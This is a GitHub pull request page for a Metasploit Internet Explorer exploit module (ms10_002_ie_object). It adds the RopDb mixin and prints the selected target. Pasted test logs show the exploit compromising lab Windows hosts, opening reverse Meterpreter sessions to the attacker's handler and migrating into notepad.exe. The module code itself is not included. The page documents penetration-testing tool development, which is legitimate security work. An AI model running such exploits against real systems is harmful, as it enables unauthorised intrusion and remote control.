Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Use RopDb, and print what target the module has been selected. #869

Merged
merged 1 commit into from Oct 7, 2012
Merged

Use RopDb, and print what target the module has been selected. #869

merged 1 commit into from Oct 7, 2012

Conversation

wchen-r7
Copy link
Contributor

@wchen-r7 wchen-r7 commented Oct 7, 2012

This pull request has the following changes:

  • RopDb mixin
  • Print the target selection

Test Results:

Test #1:

msf  exploit(ms10_002_ie_object) > [*] Server started.
[*] 10.0.1.7         ms10_002_ie_object - Target selected: IE 8 on Windows 7 SP0
[*] 10.0.1.7         ms10_002_ie_object - Sending HTML
[*] Sending stage (752128 bytes) to 10.0.1.7
[*] Meterpreter session 4 opened (10.0.1.3:4444 -> 10.0.1.7:49159) at 2012-10-07 01:38:19 -0500
[*] Session ID 4 (10.0.1.3:4444 -> 10.0.1.7:49159) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2564)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2968
[+] Successfully migrated to process

Test #2:

msf  exploit(ms10_002_ie_object) > [*]  Local IP: http://10.0.1.3:8080/z7uDAsVGewMR
[*] Server started.
[*] 10.0.1.6         ms10_002_ie_object - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         ms10_002_ie_object - Sending HTML
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 5 opened (10.0.1.3:4444 -> 10.0.1.6:1061) at 2012-10-07 01:42:04 -0500
[*] Session ID 5 (10.0.1.3:4444 -> 10.0.1.6:1061) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (880)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2288

@jvazquez-r7
Copy link
Contributor

Eyeballed, looks good, and tested successfully on Windows XP SP3:

rmsf  exploit(ms10_002_ie_object) > rexploit
[*] Reloading module...
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.128:4444 
[*] Using URL: http://0.0.0.0:8080/ZW9XzC
[*]  Local IP: http://192.168.1.128:8080/ZW9XzC
[*] Server started.
msf  exploit(ms10_002_ie_object) > [*] 192.168.1.152    ms10_002_ie_object - Target selected: IE 8 on Windows XP SP3
[*] 192.168.1.152    ms10_002_ie_object - Sending HTML
[*] Sending stage (752128 bytes) to 192.168.1.152
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.152:1386) at 2012-10-07 17:33:47 +0200
[*] Session ID 1 (192.168.1.128:4444 -> 192.168.1.152:1386) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2648)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2512
[+] Successfully migrated to process

@jvazquez-r7 jvazquez-r7 merged commit bdb9b75 into rapid7:master Oct 7, 2012
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@wchen-r7 @jvazquez-r7 @sinn3r